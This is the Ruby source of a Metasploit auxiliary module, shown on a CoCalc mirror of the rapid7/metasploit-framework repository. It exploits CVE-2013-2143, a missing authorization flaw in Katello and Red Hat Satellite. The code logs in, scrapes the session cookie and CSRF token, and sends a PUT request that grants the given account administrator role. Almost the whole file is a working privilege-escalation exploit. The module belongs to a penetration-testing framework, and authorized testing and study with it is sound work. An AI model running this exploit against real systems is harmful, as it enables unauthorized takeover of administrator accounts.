CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize

10
    super(

11
      'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',

12
      'Description' => %q{

13
          This module exploits a missing authorization vulnerability in the

14
        "update_roles" action of "users" controller of Katello and Red Hat Satellite

15
        (Katello 1.5.0-14 and earlier) by changing the specified account to an

16
        administrator account.

17
      },

18
      'Author' => 'Ramon de C Valle',

19
      'License' => MSF_LICENSE,

20
      'References' => [

21
        ['CVE', '2013-2143'],

22
        ['CWE', '862'],

23
        ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849']

24
      ],

25
      'DisclosureDate' => 'Mar 24 2014'

26
    )

27


28
    register_options(

29
      [

30
        Opt::RPORT(443),

31
        OptBool.new('SSL', [true, 'Use SSL', true]),

32
        OptString.new('USERNAME', [true, 'Your username']),

33
        OptString.new('PASSWORD', [true, 'Your password']),

34
        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),

35
      ], self.class

36
    )

37
  end

38


39
  def run

40
    print_status("Logging into #{target_url}...")

41
    res = send_request_cgi(

42
      'method' => 'GET',

43
      'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),

44
      'vars_get' => {

45
        'username' => datastore['USERNAME'],

46
        'password' => datastore['PASSWORD']

47
      }

48
    )

49


50
    if res.nil?

51
      print_error('No response from remote host')

52
      return

53
    end

54


55
    if res.headers['Location'] =~ %r{user_session/new$}

56
      print_error('Authentication failed')

57
      return

58
    else

59
      session = ::Regexp.last_match(1) if res.get_cookies =~ /_katello_session=(\S*);/

60


61
      if session.nil?

62
        print_error('Failed to retrieve the current session')

63
        return

64
      end

65
    end

66


67
    print_status('Retrieving the CSRF token for this session...')

68
    res = send_request_cgi(

69
      'cookie' => "_katello_session=#{session}",

70
      'method' => 'GET',

71
      'uri' => normalize_uri(target_uri.path, 'dashboard')

72
    )

73


74
    if res.nil?

75
      print_error('No response from remote host')

76
      return

77
    end

78


79
    if res.headers['Location'] =~ %r{user_session/new$}

80
      print_error('Authentication failed')

81
      return

82
    else

83
      session = ::Regexp.last_match(1) if res.get_cookies =~ /_katello_session=(\S*);/

84


85
      if session.nil?

86
        print_error('Failed to retrieve the current session')

87
        return

88
      end

89
    end

90


91
    if res.headers['Location'] =~ %r{user_session/new$}

92
      print_error('Failed to retrieve the user id')

93
      return

94
    else

95
      csrf_token = ::Regexp.last_match(1) if res.body =~ %r{<meta +content="(\S*)" +name="csrf-token" */?>}i

96
      if csrf_token.nil? && (res.body =~ %r{<meta +name="csrf-token" +content="(\S*)" */?>}i)

97
        csrf_token = ::Regexp.last_match(1)

98
      end

99


100
      if csrf_token.nil?

101
        print_error('Failed to retrieve the CSRF token')

102
        return

103
      end

104


105
      user = ::Regexp.last_match(1) if res.body =~ %r{/users.(\d+)#list_search=#{datastore['USERNAME']}}

106


107
      if user.nil?

108
        print_error('Failed to retrieve the user id')

109
        return

110
      end

111
    end

112


113
    print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")

114
    res = send_request_cgi(

115
      'cookie' => "_katello_session=#{session}",

116
      'headers' => {

117
        'X-CSRF-Token' => csrf_token

118
      },

119
      'method' => 'PUT',

120
      'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),

121
      'vars_post' => {

122
        'user[role_ids][]' => '1'

123
      }

124
    )

125


126
    if res.nil?

127
      print_error('No response from remote host')

128
      return

129
    end

130


131
    if res.headers['X-Message-Type'] =~ /success$/

132
      print_good('User updated successfully')

133
    else

134
      print_error('Failed to update user')

135
    end

136
  end

137


138
  def target_url(*args)

139
    (ssl ? 'https' : 'http') +

140
      if rport.to_i == 80 || rport.to_i == 443

141
        "://#{vhost}"

142
      else

143
        "://#{vhost}:#{rport}"

144
      end + normalize_uri(target_uri.path, *args)

145
  end

146
end

147


148